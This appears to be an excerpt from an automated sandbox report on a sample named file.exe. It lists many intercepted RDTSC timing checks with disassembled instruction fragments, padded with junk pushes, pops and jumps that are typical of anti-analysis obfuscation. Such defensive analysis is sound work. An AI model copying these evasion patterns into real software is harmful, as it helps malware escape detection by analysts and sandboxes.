                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390F00 second address: 5390F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380D87 second address: 5380D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380D8D second address: 5380D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380D91 second address: 5380DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, 063Bh 0x0000000e mov si, CB17h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FD288CC4A6Ah 0x00000019 mov ebp, esp 0x0000001b jmp 00007FD288CC4A70h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FD288CC4A6Dh 0x00000029 pop eax 0x0000002a mov bx, 0594h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0682 second address: 53C0695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0695 second address: 53C0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0699 second address: 53C069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C069F second address: 53C0703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e movsx edx, ax 0x00000011 mov esi, 1C411713h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a movzx esi, di 0x0000001d mov bh, 11h 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FD288CC4A75h 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007FD288CC4A71h 0x00000030 and ax, 5736h 0x00000035 jmp 00007FD288CC4A71h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360173 second address: 536018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536018F second address: 5360193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360193 second address: 5360199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360199 second address: 536019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536019F second address: 53601A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A2E second address: 5380A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380A32 second address: 5380A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380634 second address: 538064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A6Bh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538064B second address: 5380668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53804E0 second address: 5380557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD288CC4A6Fh 0x00000008 pushfd 0x00000009 jmp 00007FD288CC4A78h 0x0000000e xor eax, 2365FB88h 0x00000014 jmp 00007FD288CC4A6Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FD288CC4A79h 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD288CC4A78h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380557 second address: 538055B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538055B second address: 5380561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380561 second address: 538058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2884F85D7h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538058E second address: 5380593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380593 second address: 53805A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 15D8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53805A5 second address: 53805A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53805A9 second address: 53805AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53802B6 second address: 53802F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD288CC4A70h 0x0000000f push eax 0x00000010 jmp 00007FD288CC4A6Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53802F0 second address: 53802F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53802F4 second address: 53802FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390106 second address: 539010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539010C second address: 5390184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 034Dh 0x0000000f pushfd 0x00000010 jmp 00007FD288CC4A6Ah 0x00000015 xor eax, 4188B268h 0x0000001b jmp 00007FD288CC4A6Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FD288CC4A72h 0x0000002c add eax, 1EAD84C8h 0x00000032 jmp 00007FD288CC4A6Bh 0x00000037 popfd 0x00000038 jmp 00007FD288CC4A78h 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C05FF second address: 53C0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0604 second address: 53C060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0332 second address: 53A0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD2884F85D1h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FD2884F85D1h 0x0000000f sbb si, 1946h 0x00000014 jmp 00007FD2884F85D1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD2884F85CDh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0383 second address: 53A0389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0389 second address: 53A03D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD2884F85CFh 0x00000013 sub cx, 05DEh 0x00000018 jmp 00007FD2884F85D9h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov si, 10FDh 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A03D9 second address: 53A0451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD288CC4A6Fh 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov esi, 172602ABh 0x00000013 pushfd 0x00000014 jmp 00007FD288CC4A70h 0x00000019 sbb al, 00000038h 0x0000001c jmp 00007FD288CC4A6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD288CC4A6Bh 0x0000002d add eax, 26C2E5FEh 0x00000033 jmp 00007FD288CC4A79h 0x00000038 popfd 0x00000039 popad 0x0000003a and dword ptr [eax], 00000000h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0451 second address: 53A0455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0455 second address: 53A0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0459 second address: 53A045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538043C second address: 5380471 instructions: 0x00000000 rdtsc 0x00000002 mov dh, DFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, ah 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b mov ecx, 617CF3AFh 0x00000010 mov bl, ah 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FD288CC4A77h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380471 second address: 5380475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380475 second address: 538047B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538047B second address: 5380498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E40 second address: 5390E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E44 second address: 5390E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E48 second address: 5390E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E4E second address: 5390E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E6D second address: 5390E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0102 second address: 53A013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD2884F85CDh 0x00000013 jmp 00007FD2884F85CBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A013A second address: 53A013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A013F second address: 53A0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0155 second address: 53A0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0159 second address: 53A01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FD2884F85D3h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007FD2884F85D9h 0x00000018 xor esi, 5E7FE226h 0x0000001e jmp 00007FD2884F85D1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01AC second address: 53A01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A6Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01D1 second address: 53A01D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01D7 second address: 53A01DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01DB second address: 53A01F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bx, BE28h 0x0000000f pushad 0x00000010 mov edi, 0A00A972h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D24 second address: 53B0D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD288CC4A6Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD288CC4A70h 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D60 second address: 53B0D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D64 second address: 53B0D86 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FD288CC4A72h 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D86 second address: 53B0D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D8A second address: 53B0D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D90 second address: 53B0D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D96 second address: 53B0D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D9A second address: 53B0E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [774365FCh] 0x0000000d pushad 0x0000000e push esi 0x0000000f pushfd 0x00000010 jmp 00007FD2884F85CFh 0x00000015 or ax, A27Eh 0x0000001a jmp 00007FD2884F85D9h 0x0000001f popfd 0x00000020 pop esi 0x00000021 mov ax, di 0x00000024 popad 0x00000025 test eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FD2884F85D4h 0x00000030 jmp 00007FD2884F85D5h 0x00000035 popfd 0x00000036 movzx ecx, bx 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E11 second address: 53B0E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD2FACC75ADh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E2C second address: 53B0E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E31 second address: 53B0E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FD288CC4A70h 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 push edi 0x00000015 pushfd 0x00000016 jmp 00007FD288CC4A6Ah 0x0000001b sbb ecx, 338C83C8h 0x00000021 jmp 00007FD288CC4A6Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 mov esi, ebx 0x0000002a popad 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov cx, F5D3h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E90 second address: 53B0E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ror eax, cl 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E9E second address: 53B0EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0EA2 second address: 53B0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0EB8 second address: 53B0F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FD288CC4A76h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00BA2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FD28D515887h 0x0000002a push FFFFFFFEh 0x0000002c jmp 00007FD288CC4A70h 0x00000031 pop eax 0x00000032 jmp 00007FD288CC4A70h 0x00000037 ret 0x00000038 nop 0x00000039 push eax 0x0000003a call 00007FD28D5158A4h 0x0000003f mov edi, edi 0x00000041 jmp 00007FD288CC4A70h 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FD288CC4A77h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F31 second address: 53B0F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F49 second address: 53B0F7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD288CC4A79h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F7B second address: 53B0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F7F second address: 53B0F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F83 second address: 53B0F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370007 second address: 5370060 instructions: 0x00000000 rdtsc 0x00000002 mov dh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 mov si, B667h 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov eax, 1DC8E675h 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007FD288CC4A6Dh 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov ax, 0DE3h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007FD288CC4A76h 0x0000002f xor si, C628h 0x00000034 jmp 00007FD288CC4A6Bh 0x00000039 popfd 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370060 second address: 537009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 and esp, FFFFFFF8h 0x00000008 jmp 00007FD2884F85D5h 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2884F85D8h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537009A second address: 537009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537009E second address: 53700A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700A4 second address: 53700D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 jmp 00007FD288CC4A78h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD288CC4A6Eh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700D6 second address: 53700DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
